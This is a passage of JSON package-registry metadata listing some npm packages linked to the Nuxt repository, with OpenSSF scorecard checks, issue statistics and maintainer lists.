nt.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:42:22.695Z","updated_at":"2025-02-11T09:42:22.695Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8499173,"name":"nuxt-with-fixed-cache","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2023-10-27T16:49:51.205Z","latest_release_published_at":"2023-10-27T16:49:51.205Z","latest_release_number":"3.6.0","last_synced_at":"2026-05-11T01:23:02.975Z","created_at":"2023-10-27T16:50:12.014Z","updated_at":"2026-05-11T01:23:02.975Z","registry_url":"https://www.npmjs.com/package/nuxt-with-fixed-cache","install_command":"npm install nuxt-with-fixed-cache","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.6.0"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:00.837Z","dependent_packages_count":0,"downloads":4,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.0945190116872,"dependent_packages_count":52.848639588667325,"stargazers_count":0.16156667964276886,"forks_count":0.5407056536971946,"docker_downloads_count":null,"average":22.66135773342362},"purl":"pkg:npm/nuxt-with-fixed-cache","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/nuxt-with-fixed-cache","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/nuxt-with-fixed-cache","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/nuxt-with-fixed-cache/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-with-fixed-cache/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-with-fixed-cache/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-with-fixed-cache/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-with-fixed-cache/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-with-fixed-cache/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-with-fixed-cache/codemeta","maintainers":[{"uuid":"therealguriev","login":"therealguriev","name":null,"email":"gurievcreative@gmail.com","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~therealguriev","role":null,"created_at":"2023-10-27T16:50:13.662Z","updated_at":"2023-10-27T16:50:13.662Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/therealguriev/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343188,"name":"rsnuxt-start","ecosystem":"npm","description":"Starts Nuxt Application in production mode","homepage":"https://github.com/nuxt/nuxt.js#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":["nuxt","nuxt.js","nuxtjs","ssr","vue","vue isomorphic","vue server side","vue ssr","vue universal","vue versatile","vue.js","vuejs"],"namespace":null,"versions_count":23,"first_release_published_at":"2025-02-11T09:15:01.041Z","latest_release_published_at":"2025-10-11T04:55:29.407Z","latest_release_number":"0.5.11","last_synced_at":"2026-05-11T01:23:02.736Z","created_at":"2025-02-11T09:37:01.117Z","updated_at":"2026-05-11T01:23:02.736Z","registry_url":"https://www.npmjs.com/package/rsnuxt-start","install_command":"npm install rsnuxt-start","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","0.2.2-alpha.2":"0.2.2-alpha.2","latest":"0.5.11"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-24T15:11:02.000Z","size":136837,"stargazers_count":60120,"open_issues_count":949,"forks_count":5591,"subscribers_count":777,"default_branch":"main","last_synced_at":"2026-04-24T20:04:41.708Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-24T18:27:37.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":317,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous 